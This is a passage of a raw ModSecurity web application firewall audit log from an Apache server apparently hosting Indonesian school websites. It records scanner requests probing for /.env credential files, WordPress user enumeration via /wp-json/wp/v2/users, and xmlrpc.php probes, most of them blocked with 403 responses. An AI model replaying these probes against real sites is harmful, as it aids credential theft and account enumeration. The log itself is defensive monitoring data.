text/html; charset=iso-8859-1 --f0795b16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747109192068242 2682 (- - -) Stopwatch2: 1747109192068242 2682; combined=1369, p1=409, p2=938, p3=0, p4=0, p5=22, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0795b16-Z-- --31f10554-A-- [13/May/2025:11:53:04 +0700] aCLQMI_RcapTWo3LoyeIdAAAAFQ 103.236.140.4 55692 103.236.140.4 8181 --31f10554-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.110.147.123 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.110.147.123 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --31f10554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31f10554-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747111984013146 799 (- - -) Stopwatch2: 1747111984013146 799; combined=328, p1=289, p2=0, p3=0, p4=0, p5=38, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31f10554-Z-- --dab26934-A-- [13/May/2025:12:25:54 +0700] aCLX4o_RcapTWo3LoyeIjgAAAEQ 103.236.140.4 55986 103.236.140.4 8181 --dab26934-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.30.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.30.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dab26934-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dab26934-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747113954310272 2721 (- - -) Stopwatch2: 1747113954310272 2721; combined=1228, p1=413, p2=785, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dab26934-Z-- --04fe411c-A-- [13/May/2025:12:26:47 +0700] aCLYF-O55leZpQyxFsY_GAAAAII 103.236.140.4 55992 103.236.140.4 8181 --04fe411c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04fe411c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04fe411c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747114007753366 2888 (- - -) Stopwatch2: 1747114007753366 2888; combined=1262, p1=456, p2=775, p3=0, p4=0, p5=31, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04fe411c-Z-- --2dd5e946-A-- [13/May/2025:12:26:51 +0700] aCLYG43mg5f2L4Eof6METQAAAMw 103.236.140.4 55996 103.236.140.4 8181 --2dd5e946-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2dd5e946-C-- demo.sayHello --2dd5e946-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2dd5e946-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747114011509084 5104 (- - -) Stopwatch2: 1747114011509084 5104; combined=3862, p1=487, p2=3169, p3=22, p4=24, p5=93, sr=69, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2dd5e946-Z-- --09bfb169-A-- [13/May/2025:12:27:02 +0700] aCLYJo3mg5f2L4Eof6METgAAANA 103.236.140.4 56000 103.236.140.4 8181 --09bfb169-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 193.207.56.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.207.56.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --09bfb169-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09bfb169-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747114022951807 3049 (- - -) Stopwatch2: 1747114022951807 3049; combined=1334, p1=481, p2=824, p3=0, p4=0, p5=29, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09bfb169-Z-- --08c11804-A-- [13/May/2025:12:33:32 +0700] aCLZrI_RcapTWo3LoyeIlQAAAFE 103.236.140.4 56024 103.236.140.4 8181 --08c11804-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.67 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --08c11804-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08c11804-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747114412249937 2815 (- - -) Stopwatch2: 1747114412249937 2815; combined=1245, p1=438, p2=777, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08c11804-Z-- --9494937f-A-- [13/May/2025:12:33:35 +0700] aCLZr4_RcapTWo3LoyeIlwAAAFU 103.236.140.4 56028 103.236.140.4 8181 --9494937f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.67 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9494937f-C-- demo.sayHello --9494937f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9494937f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747114415201361 5299 (- - -) Stopwatch2: 1747114415201361 5299; combined=3968, p1=444, p2=3285, p3=29, p4=33, p5=102, sr=67, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9494937f-Z-- --c283d47a-A-- [13/May/2025:12:38:08 +0700] aCLawI3mg5f2L4Eof6MEUwAAAMA 103.236.140.4 56052 103.236.140.4 8181 --c283d47a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c283d47a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c283d47a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747114688448121 2760 (- - -) Stopwatch2: 1747114688448121 2760; combined=1237, p1=432, p2=775, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c283d47a-Z-- --424e3915-A-- [13/May/2025:12:38:11 +0700] aCLaw4_RcapTWo3LoyeIngAAAEQ 103.236.140.4 56056 103.236.140.4 8181 --424e3915-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --424e3915-C-- demo.sayHello --424e3915-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --424e3915-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747114691233680 4840 (- - -) Stopwatch2: 1747114691233680 4840; combined=3856, p1=431, p2=3197, p3=28, p4=32, p5=97, sr=68, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --424e3915-Z-- --562ee276-A-- [13/May/2025:12:42:48 +0700] aCLb2I_RcapTWo3LoyeIowAAAFI 103.236.140.4 56080 103.236.140.4 8181 --562ee276-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.235.17.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.235.17.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --562ee276-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --562ee276-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747114968318733 3238 (- - -) Stopwatch2: 1747114968318733 3238; combined=1391, p1=488, p2=868, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --562ee276-Z-- --e95e533a-A-- [13/May/2025:13:01:47 +0700] aCLgS4_RcapTWo3LoyeI5AAAAEA 103.236.140.4 56684 103.236.140.4 8181 --e95e533a-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.203.57.61 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: */* Cookie: X-Forwarded-For: 159.203.57.61 Accept-Encoding: gzip X-Varnish: 147145588 --e95e533a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e95e533a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747116107353547 752 (- - -) Stopwatch2: 1747116107353547 752; combined=315, p1=232, p2=0, p3=0, p4=0, p5=83, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e95e533a-Z-- --93433d23-A-- [13/May/2025:13:22:59 +0700] aCLlQ4_RcapTWo3LoyeI-gAAAE4 103.236.140.4 56930 103.236.140.4 8181 --93433d23-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 6.0; zh-CN; KNT-UL10 Build/HUAWEIKNT-UL10) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Quark/3.0.2.943 Mobile Safari/537.36 Accept-Charset: utf-8 --93433d23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93433d23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747117379912059 991 (- - -) Stopwatch2: 1747117379912059 991; combined=423, p1=356, p2=0, p3=0, p4=0, p5=67, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93433d23-Z-- --ff2d9101-A-- [13/May/2025:13:23:47 +0700] aCLlc4_RcapTWo3LoyeI-wAAAFU 103.236.140.4 56932 103.236.140.4 8181 --ff2d9101-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0) Accept-Charset: utf-8 --ff2d9101-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff2d9101-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747117427181369 850 (- - -) Stopwatch2: 1747117427181369 850; combined=348, p1=305, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff2d9101-Z-- --c5e44272-A-- [13/May/2025:13:24:29 +0700] aCLlnY_RcapTWo3LoyeI_QAAAFQ 103.236.140.4 56936 103.236.140.4 8181 --c5e44272-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: https Connection: close User-Agent: Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1 Accept-Charset: utf-8 --c5e44272-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5e44272-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747117469513580 987 (- - -) Stopwatch2: 1747117469513580 987; combined=374, p1=330, p2=0, p3=0, p4=0, p5=44, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5e44272-Z-- --ae4ea233-A-- [13/May/2025:13:25:00 +0700] aCLlvI3mg5f2L4Eof6MEyAAAAMQ 103.236.140.4 56938 103.236.140.4 8181 --ae4ea233-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.98 Chrome/71.0.3578.98 Safari/537.36 Accept-Charset: utf-8 --ae4ea233-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae4ea233-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747117500472765 900 (- - -) Stopwatch2: 1747117500472765 900; combined=390, p1=336, p2=0, p3=0, p4=0, p5=53, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae4ea233-Z-- --ae43962c-A-- [13/May/2025:13:26:03 +0700] aCLl-4_RcapTWo3LoyeI_wAAAEY 103.236.140.4 56944 103.236.140.4 8181 --ae43962c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/3.01Gold (Win95; I) Accept-Charset: utf-8 --ae43962c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae43962c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747117563732334 851 (- - -) Stopwatch2: 1747117563732334 851; combined=339, p1=297, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae43962c-Z-- --0e50cb73-A-- [13/May/2025:15:08:59 +0700] aCL-G-O55leZpQyxFsZB2AAAAIY 103.236.140.4 36496 103.236.140.4 8181 --0e50cb73-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 194.163.159.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Accept-Charset: utf-8 --0e50cb73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e50cb73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747123739998848 976 (- - -) Stopwatch2: 1747123739998848 976; combined=377, p1=323, p2=0, p3=0, p4=0, p5=53, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e50cb73-Z-- --79006a6f-A-- [13/May/2025:17:19:20 +0700] aCMcqI3mg5f2L4Eof6MJ3gAAANM 103.236.140.4 41948 103.236.140.4 8181 --79006a6f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.110.147.123 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.110.147.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --79006a6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79006a6f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 